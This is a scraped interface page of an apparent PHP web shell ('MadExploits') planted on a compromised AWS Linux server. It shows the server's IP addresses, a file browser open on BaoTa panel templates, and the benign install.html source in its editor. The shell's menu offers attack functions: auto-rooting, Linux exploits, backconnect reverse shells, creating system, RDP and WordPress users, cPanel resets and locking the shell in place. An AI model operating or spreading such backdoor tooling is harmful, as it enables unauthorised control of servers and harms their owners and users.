Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.149.4.109
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
BTPanel /
templates /
default /
[ HOME SHELL ]
Name
Size
Permission
Action
autherr.html
14.66
KB
-rwxr-xr-x
close.html
329
B
-rwxr-xr-x
config.html
27.09
KB
-rwxr-xr-x
control.html
15.72
KB
-rwxr-xr-x
crontab.html
4.08
KB
-rwxr-xr-x
database.html
6.76
KB
-rwxr-xr-x
docker.html
14.83
KB
-rwxr-xr-x
down.html
128.08
KB
-rwxr-xr-x
error.html
152
B
-rwxr-xr-x
error2.html
6.13
KB
-rwxr-xr-x
error3.html
7.74
KB
-rwxr-xr-x
files.html
24.26
KB
-rwxr-xr-x
files_test.html
4.81
KB
-rwxr-xr-x
firewall.html
24.12
KB
-rwxr-xr-x
firewall_new.html
14.68
KB
-rwxr-xr-x
ftp.html
12.65
KB
-rwxr-xr-x
index.html
13.88
KB
-rwxr-xr-x
index_new.html
3.88
KB
-rwxr-xr-x
install.html
2.35
KB
-rwxr-xr-x
layout.html
36.73
KB
-rwxr-xr-x
license.html
19.63
KB
-rwxr-xr-x
login.html
74.73
KB
-rwxr-xr-x
logs.html
22.37
KB
-rwxr-xr-x
modify_password.html
2.74
KB
-rwxr-xr-x
movie.html
131
B
-rwxr-xr-x
panel_error.html
1.02
KB
-rwxr-xr-x
plugin_error.html
1.45
KB
-rwxr-xr-x
site.html
4.15
KB
-rwxr-xr-x
soft.html
3.57
KB
-rwxr-xr-x
tips.html
56.32
KB
-rwxr-xr-x
unsubscribe.html
7.73
KB
-rwxr-xr-x
xterm.html
6.78
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install.html
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex,nofollow"> <title>{{data['lan']['TITLE']}}</title> <link href="/static/css/install.css" rel="stylesheet"> <script type="text/javascript" src="/static/js/jquery.js"></script> <script type="text/javascript" src="/static/layer/layer.js"></script> </head> <body> <div class="main"> {% if data['status'] %} <div class="warp"> <div class="title">{{data['lan']['INIT_PANEL']}}</div> <form class="form" action="/install?action=install" method="post" onsubmit="return checkSubmit()"> <fieldset> <legend>{{data['lan']['SET_ADMIN']}}</legend> <p><span class="tit">{{data['lan']['USER_NAME']}}</span><input type="text" name="bt_username" value="{{data['username']}}" /> {{data['lan']['SET_ADMIN_NAME']}}</p> <p><span class="tit">{{data['lan']['MAM_PASS']}} </span><input type="password" name="bt_password1" value="" /> {{data['lan']['SET_ADMIN_NAME']}}</p> <p><span class="tit">{{data['lan']['REPEAT_PASS']}} </span><input type="password" name="bt_password2" value="" /> {{data['lan']['SET_ADMIN_PASS']}}</p> </fieldset> <input class="submit-btn" type="submit" value="{{data['lan']['CONFIRM']}}" /> </form> </div> {% else %} <div class="success"> <p>{{data['lan']['INIT_PANEL_SUCCESS']}}</p> <a href="/login">{{data['lan']['LOGIN_PAGE']}}</a> </div> {% endif %} </div> <div class="copyright">Copyright © 2014-2099 <a href="http://www.bt.cn" target="_blank">{{data['lan']['BT']}}</a>{{data['lan']['PS1']}}(<a href="http://www.bt.cn" target="_blank">www.bt.cn</a>) All Rights Reserved</div> <script> function checkSubmit(){ var username = $("input[name='bt_username']").val(); var password1 = $("input[name='bt_password1']").val(); var password2 = $("input[name='bt_password2']").val(); if(username == '' || password1 == ''){ layer.msg(lan.install.passwd_cant_empty,{icon:5}); return false; } if(password1 != password2){ layer.msg(lan.install.passwd_not_same,{icon:5}); return false; } layer.msg(lan.install.setting_up,{icon:16,time:0}); return true; } var main = $(".main"); $(window).resize(function () { var wh = $(window).height(); main.height(wh); }).resize(); </script> </body> </html>
Close